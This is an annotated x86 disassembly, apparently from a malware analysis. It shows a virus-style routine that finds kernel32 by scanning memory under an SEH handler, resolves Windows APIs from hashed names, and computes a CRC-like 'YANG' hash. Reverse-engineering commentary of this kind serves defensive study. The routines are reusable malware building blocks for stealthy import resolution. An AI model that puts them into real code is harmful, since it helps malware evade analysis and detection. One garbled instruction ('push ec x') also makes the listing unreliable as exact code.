; seek_module_and_apis+5Bj
add ebx, 10000h ; ebx = 77E00000h (next 64K-aligned candidate)
cmp ebx, 80500000h
ja short hKernel32_found_end ; upper bound of the scan
cmp word ptr [ebx], 5A4Dh ; MZ
jnz short loop_to_seek_pe_module
mov eax, [ebx+3Ch] ; e_lfanew
add eax, ebx
cmp word ptr [eax], 4550h ; PE
jnz short loop_to_seek_pe_module
;==================================
; out:
; eax - PE header pointer
; ebx - hKernel32 (if correct)
;==================================
mov [ebp-1C9h], ebx ; [4539DA] = hKernel32 (written for every PE image found, not only the matching one)
mov eax, [eax+78h] ; DataDirectory[EXPORT].VirtualAddress
add eax, ebx ; eax - Export table rva
mov edx, [eax+0Ch] ; IMAGE_EXPORT_DIRECTORY.Name
add edx, ebx ; edx = DLL Module Name rva
mov ecx, [edi] ; edi -> KERNEL32
;check pe_file_export_name == 'KERNEL32'? (only the first 8 bytes, compared as two dwords)
cmp [edx], ecx
jnz short loop_to_seek_pe_module
mov ecx, [edi+4]
cmp [edx+4], ecx
jnz short loop_to_seek_pe_module
;===============================
; out:
; eax - export table rva
; ebx - hKernel32
;===============================
hKernel32_found_end: ; CODE XREF: seek_module_and_apis+2Aj
xor ecx, ecx
pop dword ptr fs:[ecx] ; __finally: unhook the handler
pop esi ; discard the handler address
pop esi ; esi = 453BA3
; edi = 453A36
add edi, 8 ; edi = 453A3E (skip the 8-byte name -> hash table)
;=======================================
; if hKernel32 found, ebx is hInstance,
; else ebx is NULL.
;=======================================
; NOTE(review): when the scan runs past 80500000h, ebx is the last probed address rather than 0,
; so the jz below would not protect seek_all_api on that path -- confirm the intended behaviour.
or ebx, ebx
jz short loc_453C0C
call seek_all_api ; input:
; ecx = 0
; esi = 453BA3
; edi = 453A3E
loc_453C0C: ; CODE XREF: seek_module_and_apis+69j
popf
popa
retn
seek_module_and_apis endp
; ------------------------------------------------------------------
seh_handler: ; SEH handler installed by seek_module_and_apis (453C0F)
; On a probing fault, set the context's Eip to loop_to_seek_pe_module (453BBA)
; so the scan continues with the next 64K candidate.
call $+5
pop eax ; eax = address of this instruction (453C14)
lea eax, [eax-5Ah] ; eax = 453BBA = loop_to_seek_pe_module
push eax
mov eax, [esp+10h] ; ContextRecord (3rd argument; +4 because of the push above)
pop dword ptr [eax+0B8h] ; CONTEXT.Eip = resume address
xor eax, eax ; ExceptionContinueExecution
retn
; ======================= S U B R O U T I N E =======================
; input:
; ecx = 0
; esi = 453BA3
; edi = 453A3E
seek_all_api proc near ; CODE XREF: seek_module_and_apis+6Bp
; Resolves every import named by a 0-terminated table of 16-bit name hashes.
; In:  eax = IMAGE_EXPORT_DIRECTORY of the module, ebx = module base,
;      edi = hash table (e.g. 453A3E), ecx = 0, esi = scratch (overwritten).
; Out: the dword slots that follow the table's 0 terminator receive the export
;      addresses, slot i for hash i. Only the low 16 bits of the hash are
;      compared, so a collision would silently resolve the wrong export.
; Notes: exports are walked once in name-table order and each match uses up one
;      loop iteration; the return value of each lookup is not validated; DF may
;      be left set on exit (the caller's popf restores it). Clobbers eax, ecx,
;      edx, esi, edi, flags.
var_4 = dword ptr -4
cld
dec ecx ; ecx = 0xffffffff
push eax ; save the export directory pointer
xor eax, eax
repne scasw ; find the table's 0 terminator
not ecx
dec ecx
push ecx ; length (number of hashes)
push edi ; 453A4E (first address slot)
rep stosd ; ZeroMemory the address slots
pop edi
sub edi, 4 ; edi = last hash word (453A4A)
pop ecx
pop eax
; eax - export table (IMAGE_EXPORT_DIRECTORY) pointer
mov esi, [eax+20h] ; Export function name directory rva (AddressOfNames)
add esi, ebx
mov esi, [esi] ; RVA of the first name
add esi, ebx
xor edx, edx ; edx = name index
push ec x
loc_453C47: ; CODE XREF: seek_all_api+5Aj
push ecx
loc_453C48: ; CODE XREF: seek_all_api+3Bj
cmp edx, [eax+18h] ; NumberOfNames reached?
pop ecx
jz short loc_453C82
push ecx
inc edx
push eax
call creat_hash_code_for_api_name ; (advances esi past the name)
; =================================
; input:
; esi - api name
; output:
; eax - hash code for the api
; =================================
push edi ; edi - 453a4a
std
mov ecx, [esp+10h+var_4] ; ecx = number of hashes
repne scasw ; only match low word hash code (scans the table backwards)
pop edi
pop eax
jnz short loc_453C48 ; no hash matched this name -> next name
push edx
dec edx ; edx = index of the matched name
push edi
mov edi, [eax+24h] ; AddressOfNameOrdinals
add edi, ebx
movzx edx, word ptr [edi+edx*2] ; ordinal
mov edi, [eax+1Ch] ; AddressOfFunctions
add edi, ebx
mov edx, [edi+edx*4] ; function RVA
add edx, ebx ; function VA
pop edi
mov [edi+ecx*4+4], edx ; slot of the matched hash (ecx = hashes left after the match = hash index)
pop edx
pop ecx
loop loc_453C47 ; at most <number of hashes> matches
loc_453C82: ; CODE XREF: seek_all_api+26j
pop ecx
retn
seek_all_api endp
; ======================= S U B R O U T I N E =======================
;
; =================================
; input:
; esi - api name
; output:
; eax - hash code for the api
; =================================
creat_hash_code_for_api_name proc near ; CODE XREF: seek_all_api+2Bp
; CRC-32-style name hash: init 0FFFFFFFFh; for each byte, xor it into the low
; byte and run 8 right-shift rounds, xoring 59414E47h (the hex digits spell
; "YANG") whenever a 1 bit falls out; no final inversion.
; In:  esi -> NUL-terminated name.
; Out: eax = hash; esi advanced past the terminating 0. Preserves edx; sets DF=0.
push edx
push 0FFFFFFFFh
pop edx ; edx = running hash
cld
loc_453C89: ; CODE XREF: creat_hash_code_for_api_name+24j
lodsb
or al, al
jz short loc_453CAA ; end of name
nop
nop
nop
nop
xor dl, al
mov al, 8 ; 8 bit rounds per byte
loc_453C96: ; CODE XREF: creat_hash_code_for_api_name+22j
shr edx, 1
jnb short loc_453CA4 ; no carry -> no xor
nop
nop
nop
nop
xor edx, 59414E47h
loc_453CA4: ; CODE XREF: creat_hash_code_for_api_name+14j
dec al
jnz short loc_453C96
jmp short loc_453C89
; ------------------------------------------------------------------
loc_453CAA: ; CODE XREF: creat_hash_code_for_api_name+8j
xchg eax, edx ; eax = hash
pop edx
retn
creat_hash_code_for_api_name endp